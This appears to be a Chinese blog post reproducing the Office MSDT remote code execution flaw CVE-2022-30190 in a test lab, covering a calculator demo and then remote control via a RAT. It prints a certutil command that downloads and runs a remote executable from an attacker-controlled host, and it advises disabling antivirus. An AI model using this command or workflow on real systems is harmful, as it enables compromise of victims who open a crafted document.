office CVE-2022-30190 RCE 复现

简介:
当用户点击word等应用程序时,会使用URL协议调用MSDT,随即启动msdt.exe程序造成远程代码执行漏洞。简单来说就是攻击者可以恶意构造一个word文档,诱骗受害者点击,从而导致系统被黑。

0x01 环境部署

1. 测试版本
Microsoft Office LTSC 专业增强版 2021

2. 测试系统
windows 10 教育版

0x02 尝试执行calc弹出计算器

1. 利用脚本生成恶意word文件。

此时当前目录下会生成一个clickmeq.docx的带有恶意请求的word文件。

2. 本机开启监听,受害者在打开word的一瞬间会访问本机的恶意文件。

3. 将该word文件复制到虚拟机打开。

可以看到打开word的同时,系统执行了calc命令打开了计算器。

0x03 尝试获取系统权限

1. 利用大灰狼生成远控程序,将程序放在我们待会要监听的目录下。

2. 利用脚本生成恶意word文件,不过此时携带的命令就不是calc了。

certutil -urlcache -split -f http://192.168.2.1/server.exe c:\\server.exe & c:\\server.exe

上面这串命令的意思就是利用windows自带的命令certutil远程下载本地远控程序到C盘根目录并立即执行。

 

3. 先将文件复制到虚拟机并打开,随后本机开启监听服务 

 ​​​​​​​

可以看到主机已经上线

可以执行系统命令

注意事项:

  1. 由于没有做相关的免杀处理,所以需要把杀软以及windows Defender 关掉。
  2. 可以尝试其他版本的Office版本。
  3. 可以尝试其他下载命令,例如wget、curl等windows下载命令。
  4. 目前win10测试可以,其他系统也可以尝试下。
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值